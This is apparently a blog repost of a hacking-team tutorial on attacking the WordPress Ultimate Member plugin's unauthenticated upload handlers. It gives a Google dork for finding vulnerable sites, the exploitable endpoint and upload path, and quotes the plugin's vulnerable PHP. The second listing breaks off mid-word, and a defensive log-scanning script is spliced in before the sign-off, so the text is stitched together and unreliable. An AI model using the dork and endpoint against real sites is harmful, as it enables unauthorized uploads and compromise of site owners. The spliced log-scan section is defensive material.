WordPress Ultimate-Member Theme Exploit


WordPress Ultimate-Member Theme Exploit - Here I will share the WordPress Ultimate-Member exploit. First, thanks to Regi A R for giving permission to repost their tutorial. Let's go straight to how it works.

#############################################################
# Author : Regi A R
# Date : 9/23/2019 9:26 PM
# Team : Noesantara 1945 Hacker Team
# Homepage : -
# Tested on : os Windows | Linux
#############################################################


  • Dork : inurl:/wp-content/plugins/ultimate-member/
  • Exploit : site.co.il/wp-content/plugins/ultimate-member/core/lib/upload/um-image-upload.php
  • File path : site.co.il/wp-content/uploads/ultimatemember/temp/...../wp-content/uploads/

  • Vulnerable Source code => [ um-image-upload.php ]

    <?php
    // Walk up the directory tree (at most 10 levels) to locate wp-load.php.
    $i = 0;
    $dirname = dirname( __FILE__ );
    do {
        $dirname = dirname( $dirname );
        $wp_load = "{$dirname}/wp-load.php";
    } while( ++$i < 10 && !file_exists( $wp_load ) );
    require_once( $wp_load );

    global $ultimatemember;

    // Request parameters are used as received. The script is reachable directly
    // and runs no login, capability or nonce check before handling the upload.
    $id = $_POST['key'];
    $ultimatemember->fields->set_id = $_POST['set_id'];
    $ultimatemember->fields->set_mode = $_POST['set_mode'];

    $ret['error'] = null;
    $ret = array();

    if(isset($_FILES[$id]['name'])) {
        if(!is_array($_FILES[$id]['name'])) {
            $temp = $_FILES[$id]["tmp_name"];
            $file = $_FILES[$id]["name"];
            $file = sanitize_file_name($file);

            // The image check is the only validation applied to the file.
            $error = $ultimatemember->files->check_image_upload( $temp, $id );
            if ( $error ){
                $ret['error'] = $error;
            } else {
                // Store the file in the plugin's temp upload directory.
                $ret[] = $ultimatemember->files->new_image_upload_temp( $temp, $file, um_get_option('image_compression') );
            }
        }
    } else {
        $ret['error'] = __('A theme or plugin compatibility issue','ultimatemember');
    }

    echo json_encode($ret);

  • Vulnerable Source code => [ um-file-upload.php ]

    <?php
    // Same bootstrap as um-image-upload.php: locate and load wp-load.php.
    $i = 0;
    $dirname = dirname( __FILE__ );
    do {
        $dirname = dirname( $dirname );
        $wp_load = "{$dirname}/wp-load.php";
    } while( ++$i < 10 && !file_exists( $wp_load ) );
    require_once( $wp_load );

    global $ultimatemember;

    // As above, no login, capability or nonce check appears in the visible lines.
    $id = $_POST['key'];
    $ultimatemember->fields->set_id = $_POST['set_id'];
    $ultimatemember->fields->set_mode = $_POST['set_mode'];

    $ret['error'] = null;
    $ret = array();

    if(isset($_FILES[$id]['name'])) {
        if(!is_array($_FILES[$id]['name'])) {
            $temp = $_FILES[$id]["tmp_name"];
            $file = $_FILES[$id]["name"];
            $file = sanitize_file_name($file);
            $extension = pathinf
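For site owners checking whether these handlers have been called on their own server, the following added example (not part of the original tutorial or of the plugin) scans web-server access logs for POST requests to the two handler scripts shown above and for script files requested from the temp upload directory. The log format (Combined Log Format), the script-extension list and the sample lines are assumptions constructed for illustration.

```python
import re

# Combined Log Format: ip ident user [time] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# Handler scripts named on this page, anywhere under the plugin directory.
HANDLER_RE = re.compile(
    r'/wp-content/plugins/ultimate-member/.*um-(?:image|file)-upload\.php$', re.I)
# Upload temp directory named on this page.
TEMP_DIR = '/wp-content/uploads/ultimatemember/temp/'
# Assumption: extensions a typical PHP host may hand to the interpreter.
SCRIPT_EXT_RE = re.compile(r'\.(?:php\d?|phtml|phar)$', re.I)

def classify(line):
    """Return (reason, ip, path, status) for a line worth reviewing, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not an access-log line we understand
    path = m['path'].split('?', 1)[0]  # match on the path, not the query string
    status = int(m['status'])
    # Each POST to a handler is an upload attempt: review its source and timing.
    if m['method'] == 'POST' and HANDLER_RE.search(path):
        return ('handler-post', m['ip'], path, status)
    # Nothing under the upload temp directory should be a server-side script.
    if TEMP_DIR in path.lower() and SCRIPT_EXT_RE.search(path):
        return ('script-in-temp-dir', m['ip'], path, status)
    return None

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines: documentation IPs, made-up directory and file names.
_T = '[23/Sep/2019:21:26:00 +0000]'
_UP = '/wp-content/plugins/ultimate-member/core/lib/upload/'
_TMP = '/wp-content/uploads/ultimatemember/temp/'
SAMPLE = [
    f'203.0.113.7 - - {_T} "POST {_UP}um-image-upload.php HTTP/1.1" 200 87',
    f'203.0.113.7 - - {_T} "POST {_UP}um-file-upload.php?t=1 HTTP/1.1" 200 91',
    f'198.51.100.4 - - {_T} "GET {_UP}um-image-upload.php HTTP/1.1" 200 40',
    f'198.51.100.4 - - {_T} "GET {_TMP}d1/photo.jpg HTTP/1.1" 200 5120',
    f'203.0.113.7 - - {_T} "GET {_TMP}d1/notes.PHP HTTP/1.1" 404 0',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE):
        print(finding)
```

A `handler-post` finding is not proof of compromise on its own; pair it with a listing of files created under the temp directory around the same time.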

    Thank you for visiting my blog; I hope this information was useful. Apologies for any mistakes in wording or writing, I am a human, not a robot.
    Author, (abnid1337)
